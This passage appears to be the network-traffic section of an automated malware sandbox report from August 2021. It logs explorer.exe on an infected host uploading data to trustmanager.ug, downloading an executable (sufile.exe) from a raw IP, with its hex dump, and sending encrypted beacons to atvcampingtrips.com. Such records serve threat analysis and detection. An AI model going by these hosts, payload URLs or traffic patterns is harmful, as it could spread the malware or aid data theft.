src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:18.142307997 CEST	18565	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:18.172034979 CEST	18565	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----353468075b120103bc30cd6e79752b25 Host: trustmanager.ug Content-Length: 94297 Cache-Control: no-cache
Aug 23, 2021 02:09:18.172213078 CEST	18565	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 33 35 33 34 36 38 30 37 35 62 31 32 30 31 30 33 62 63 33 30 63 64 36 65 37 39 37 35 32 62 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------353468075b120103bc30cd6e79752b25Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:18.172388077 CEST	18575	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:18.172513962 CEST	18579	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:18.199795008 CEST	18628	OUT	Data Raw: b5 4e da de be 21 8e 67 d4 f5 31 14 84 84 76 9e 4d ac 46 32 01 cf 38 c8 cf d4 56 4d 4a ef 95 ee 6a 9a b2 e6 5b 1d 5f c4 2d 5c db fc 41 d6 61 30 ee 55 9f a8 6c 1f ba 2b 9f 4d 66 d9 fe f2 ba 7d 46 6b 12 69 e6 b9 99 a6 b8 96 49 65 6f bc f2 31 66 3f Data Ascii: N!g1vMF28VMJj[_-\Aa0Ul+Mf}FkiIeo1f?RiVZI)UJl9B)v2Reu[9wGNMl.oc~1u7ViPyyz#qr;]f'$m\I4}:km.89P21
Aug 23, 2021 02:09:18.199852943 CEST	18634	OUT	Data Raw: ce 7f da 35 e7 65 0b de 99 ef 67 2e fe cf d0 f4 2b 2e 3e 1d c1 f5 1f ce b9 99 2b a4 b4 38 f8 77 6d ee 7f ad 72 f2 b9 04 fb 56 98 45 ef 4f d5 9c 99 9b b2 87 a2 22 72 41 e0 d2 09 64 1d 1c 8f c6 90 9c d3 6b d1 b2 3c 1e 67 7d 09 d6 ee 55 fe 2c fd 69 Data Ascii: 5eg.+.>+8wmrVEO"rAdk<g}U,ikSUhY.m$c)ci'lT4;kfR}8h/j'ic>pPU\ <M?m%6M=#VmlF\|U}b=Jg3EoISUd.S{U}D[.
Aug 23, 2021 02:09:18.225236893 CEST	18642	OUT	Data Raw: 31 d4 2c 6f 0d 9d c2 db 5d 25 b1 93 30 3b 06 2a 1b 7a 28 20 ed 6e 57 23 8f a5 58 b7 f0 83 4f ae 4d a2 b6 b7 a5 43 a8 c5 33 c2 61 90 5c 7f 0f 25 b7 2c 45 42 e0 13 92 46 00 39 c5 5f f1 5e ab a3 6b f3 df c2 da e6 9c 63 bb d4 16 e2 d6 68 2c 66 84 5b Data Ascii: 1,o]%0;z( nW#XOMC3a\%,EBF9_^kch,f[n3LrN~e+CG/+bD"+Zg1skbnu}?K+]&B]kMd{x@%N7\U[e]M'<p ji-7mo4wlQ;$
Aug 23, 2021 02:09:18.225439072 CEST	18650	OUT	Data Raw: 0f f9 05 da ff 00 df 15 e6 7f 13 34 fb 3b 2b 9b 2f b2 5b 45 06 e4 6d c2 31 8c f3 55 0a bc ee c1 25 ca 79 1d 26 2a cd fd ba db 5c ac 6a ae a0 c1 14 98 7c e7 2d 1a b1 3c aa f1 93 c7 18 c6 30 58 61 8d 61 5c 4b 53 d1 b1 e9 bf 03 78 f1 ad ef fd 83 9f Data Ascii: 4;+/[Em1U%y&*\j\|-<0Xaa\KSxFG^\|+Yu(6NWuO61-mHoQU#}2Gk0+WR[==6"4G_Zd[\RR3ZLEbTHBgw`~1}OZ:
Aug 23, 2021 02:09:18.225505114 CEST	18660	OUT	Data Raw: 4d b5 34 75 7b 58 2c 6d 59 4e 55 a3 b7 0e 54 f6 c1 7d d5 e8 97 f6 70 0d 4a eb 17 d6 d1 8f 39 fe 4d b2 7c bc 9e 38 4c 7e 55 e6 7e 2d 4d 2a 0f 10 4f 6b a3 5b f9 56 b6 df b9 2d e6 33 19 1c 7d e6 e4 9e fc 71 c7 15 e9 ba 8b d8 8d 52 ec 3d bd c1 6f 39 Data Ascii: M4u{X,mYNUT}pJ9M\|8L~U~-M*Ok[V-3}qR=o9D;m-]RfrT1ACayQ{]->H@'qNg'$GDmi1NqTp2)u- 5DNNx4K@ZAKLAFi
Aug 23, 2021 02:09:18.225533962 CEST	18671	OUT	Data Raw: d8 a4 dc 28 e6 0e 52 5c d1 9a 8b cc 14 9e 65 2e 64 3e 56 4d ba 80 d5 0e f3 49 93 47 38 72 16 73 46 f0 2a b8 34 ea 7c c2 e5 27 df 47 99 51 0a 51 4f 98 5c a8 90 4a 69 77 93 51 e6 97 35 57 15 90 f0 49 a7 53 01 a7 03 4e e4 8b 4e a6 52 d3 11 20 34 e0 Data Ascii: (R\e.d>VMIG8rsF*4\|'GQQO\JiwQ5WISNNR 4j<LA:`JYQU)3KLAOu2XSJf)jf@@SuQ#-4SS H(q1E;;RA7pS<%(!(!pC`pl-8-5-
Aug 23, 2021 02:09:18.225558043 CEST	18681	OUT	Data Raw: a0 9a 7c c1 ca 49 ba 93 75 47 ba 93 75 2e 60 e5 26 0d 46 ea 8b 75 1b a9 f3 07 29 2e ea 42 6a 3d d4 16 a3 98 39 47 e6 82 6a 3c d1 9a 57 1f 28 f2 69 bb a9 b9 a6 e6 a6 e3 e5 1e 4d 37 34 dc d2 66 95 ca b0 e2 69 a4 d2 13 4d 26 a6 e3 48 71 34 d2 69 33 Data Ascii: \|IuGu.`&Fu).Bj=9Gj<W(iM74fiM&Hq4i3HMMLM&i4R.h4IRUg4(J)(-M(4+Bi3HM+&4RR,\I4Fi3A4UEA wQI+Es9+;QTZ5
Aug 23, 2021 02:09:18.253892899 CEST	18688	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:18.253907919 CEST	18688	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
133	192.168.2.3	49859	193.142.59.123	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:13.301078081 CEST	17910	OUT	GET /forum/docs/sufile.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 193.142.59.123
Aug 23, 2021 02:09:13.332673073 CEST	17911	IN	HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 00:09:13 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Mon, 23 Aug 2021 00:00:02 GMT ETag: "65400-5ca2eb2eaf38a" Accept-Ranges: bytes Content-Length: 414720 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 43 a9 49 62 07 c8 27 31 07 c8 27 31 07 c8 27 31 19 9a b2 31 16 c8 27 31 19 9a a4 31 6a c8 27 31 19 9a a3 31 31 c8 27 31 20 0e 5c 31 02 c8 27 31 07 c8 26 31 95 c8 27 31 19 9a ad 31 06 c8 27 31 19 9a b3 31 06 c8 27 31 19 9a b6 31 06 c8 27 31 52 69 63 68 07 c8 27 31 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8b ab be 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 de 01 00 00 18 fc 01 00 00 00 00 e0 22 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 fc 01 00 04 00 00 30 8b 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 6f 02 00 3c 00 00 00 00 b0 fc 01 60 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 f2 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 65 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 dc 01 00 00 10 00 00 00 de 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a 8b 00 00 00 f0 01 00 00 8c 00 00 00 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 2b fa 01 00 80 02 00 00 b0 03 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 35 00 00 00 b0 fc 01 00 36 00 00 00 1e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CIb'1'1'11'11j'111'1 \1'1&1'11'11'11'1Rich'1PEL_"@00o<`5`e@.text0 `.rdata*@@.data`+n@.rsrc`56@@
Aug 23, 2021 02:09:13.332705975 CEST	17913	IN	Data Raw: 00 8b ff 55 8b ec 83 ec 40 83 7d 0c 00 75 1c 83 7d 10 00 76 16 83 7d 08 00 74 09 8b 45 08 c7 00 00 00 00 00 33 c0 e9 d1 02 00 00 83 7d 08 00 74 09 8b 4d 08 c7 01 ff ff ff ff ba ff ff ff 7f 3b 55 10 1b c0 83 c0 01 89 45 ec 75 1e 68 58 f3 41 00 6a Data Ascii: U@}u}v}tE3}tM;UEuhXAjjJhAjp;u}u0:jjJhAhAhXAn8\URMUM]xM~C}t}vURjEP7:*
Aug 23, 2021 02:09:13.332730055 CEST	17914	IN	Data Raw: 8b 55 08 83 7a 04 00 74 4c 8b 45 08 8b 48 04 51 e8 c2 5a 00 00 83 c4 04 83 c0 01 89 45 fc 8b 55 fc 52 e8 10 01 00 00 83 c4 04 8b 4d f8 89 41 04 8b 55 f8 83 7a 04 00 74 1a 8b 45 08 8b 48 04 51 8b 55 fc 52 8b 45 f8 8b 48 04 51 e8 a7 57 00 00 83 c4 Data Ascii: UztLEHQZEURMAUztEHQUREHQWUBEMQPE]UQMEAMytUBPy]UQMExtMAA]UjjEP~Z]
Aug 23, 2021 02:09:13.332755089 CEST	17915	IN	Data Raw: 00 33 d2 81 e2 ff 00 00 00 89 55 c8 8b 45 f8 8b 08 83 c1 01 8b 55 f8 89 0a eb 11 8b 45 f8 50 6a 00 e8 77 69 00 00 83 c4 08 89 45 c8 83 7d c8 ff 74 56 8b 4d f8 8b 51 04 83 ea 01 8b 45 f8 89 50 04 8b 4d f8 83 79 04 00 7c 22 8b 55 f8 8b 02 c6 00 00 Data Ascii: 3UEUEPjwiE}tVMQEPMy\|"U3MUMURj&iE}tE 3MUfDJEx}]UEPMQUREPMQh@E}}EUUE
Aug 23, 2021 02:09:13.332777023 CEST	17917	IN	Data Raw: f8 01 75 01 cc 83 7d d8 00 75 2e e8 b3 2b 00 00 c7 00 16 00 00 00 6a 00 6a 36 68 60 f5 41 00 68 4c f5 41 00 68 a4 f4 41 00 e8 25 29 00 00 83 c4 14 83 c8 ff e9 8c 00 00 00 8d 55 0c 89 55 e4 e8 ef 8a 00 00 83 c0 20 50 6a 01 e8 d4 8c 00 00 83 c4 08 Data Ascii: u}u.+jj6h`AhLAhA%)UU PjE PEEPjMQ PnE PURE PjEMdY_^[]UB39
Aug 23, 2021 02:09:13.332804918 CEST	17918	IN	Data Raw: cc 2d 46 00 01 75 05 e8 6d b2 00 00 8b 45 08 50 e8 b4 b2 00 00 83 c4 04 68 ff 00 00 00 e8 87 5b 00 00 83 c4 04 5d c3 cc cc 8b ff 55 8b ec 83 ec 08 c7 45 fc 00 00 40 00 83 7d fc 00 74 0e 8b 45 fc 0f b7 08 81 f9 4d 5a 00 00 74 04 33 c0 eb 49 8b 55 Data Ascii: -FumEPh[]UE@}tEMZt3IUEB<EM9PEt3.UB=t3Mytw3U3]UQEPMQURH.FPMQEE]UEEPMQU
Aug 23, 2021 02:09:13.332829952 CEST	17919	IN	Data Raw: 04 e8 39 9b 00 00 83 c4 04 c3 8b 45 e0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b ff 55 8b ec 83 ec 08 83 7d 08 00 76 6b b8 e0 ff ff ff 33 d2 f7 75 08 3b 45 0c 1b c0 83 c0 01 89 45 f8 75 21 68 bc f8 41 00 6a 00 68 48 02 00 00 68 10 Data Ascii: 9EMdY_^[]U}vk3u;EEu!hAjhHhAjS!u}u- jhHhAhAhAN3KUUUEPMQUREPH.FQUR=E}tEPjMQrE]U
Aug 23, 2021 02:09:13.332858086 CEST	17921	IN	Data Raw: 6a 01 e8 2e ad 00 00 83 c4 18 83 f8 01 75 01 cc e8 00 1c 00 00 c7 00 16 00 00 00 33 c0 e9 88 02 00 00 83 7d 1c 00 74 25 8b 55 fc 83 c2 24 52 8b 45 f4 50 e8 6d b4 00 00 83 c4 08 89 45 f0 83 7d f0 00 75 07 33 c0 e9 5f 02 00 00 eb 23 8b 4d fc 83 c1 Data Ascii: j.u3}t%U$REPmE}u3_#M$QURxE}u3:3u0B0B}u\|=-Fs9U-F+B-F+-F;Mv-FU-F-FE-F+H-F-FU-F-F;
Aug 23, 2021 02:09:13.332880974 CEST	17922	IN	Data Raw: f7 41 00 50 68 10 ff 41 00 6a 00 6a 00 6a 00 6a 01 e8 e5 a7 00 00 83 c4 28 83 f8 01 75 01 cc eb 3c 8b 55 fc 83 c2 20 52 8b 45 fc 8b 48 18 51 8b 55 fc 8b 42 14 25 ff ff 00 00 8b 0c 85 3c f7 41 00 51 68 80 fe 41 00 6a 00 6a 00 6a 00 6a 01 e8 a7 a7 Data Ascii: APhAjjjj(u<U REHQUB%<AQhAjjjj uj8BPMQEL QQUztMEHQUBPM QUBPMQ<APhAjjjj+(u<U REHQUB%
Aug 23, 2021 02:09:13.332902908 CEST	17924	IN	Data Raw: e4 87 42 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 a1 28 80 42 00 83 e0 01 75 0a b8 01 00 00 00 e9 ed 03 00 00 6a 04 e8 23 8b 00 00 83 c4 04 c7 45 fc 00 00 00 00 e8 c4 ae 00 00 89 45 e0 83 7d e0 ff 0f 84 e4 00 00 00 83 7d e0 fe 0f 84 da 00 Data Ascii: B1E3PEd(Buj#EE}}MMUU}E$=@hxBhAjjjj3uhTBhAjjjjudh0BhAjjjjuBhBhAjjjj
Aug 23, 2021 02:09:13.363715887 CEST	17925	IN	Data Raw: f8 10 25 ff ff 00 00 a3 f0 2d 46 00 c7 05 d8 2d 46 00 00 00 00 00 8b 4d 08 89 0d 28 80 42 00 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 0b 6a 04 e8 23 86 00 00 83 c4 04 c3 8b 45 e4 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc Data Ascii: %-F-FM(BEj#EMdY_^[]U3}]UQ}u3jj E Pu3h=<uIM Q]E}tU REP2M Qj2FRAE Pj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
134	192.168.2.3	49860	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:13.970340014 CEST	18342	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: atvcampingtrips.com
Aug 23, 2021 02:09:13.970427036 CEST	18342	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 12 6b 2c 90 f4 76 0b 75 61 46 cc 83 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA ,[k,vuaFa0SG}};ITRmM.>OMEfEBby?I.cEg=KG$nOV<43PY,fs1W
Aug 23, 2021 02:09:15.143187046 CEST	18343	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:14 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
135	192.168.2.3	49861	218.233.73.202	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
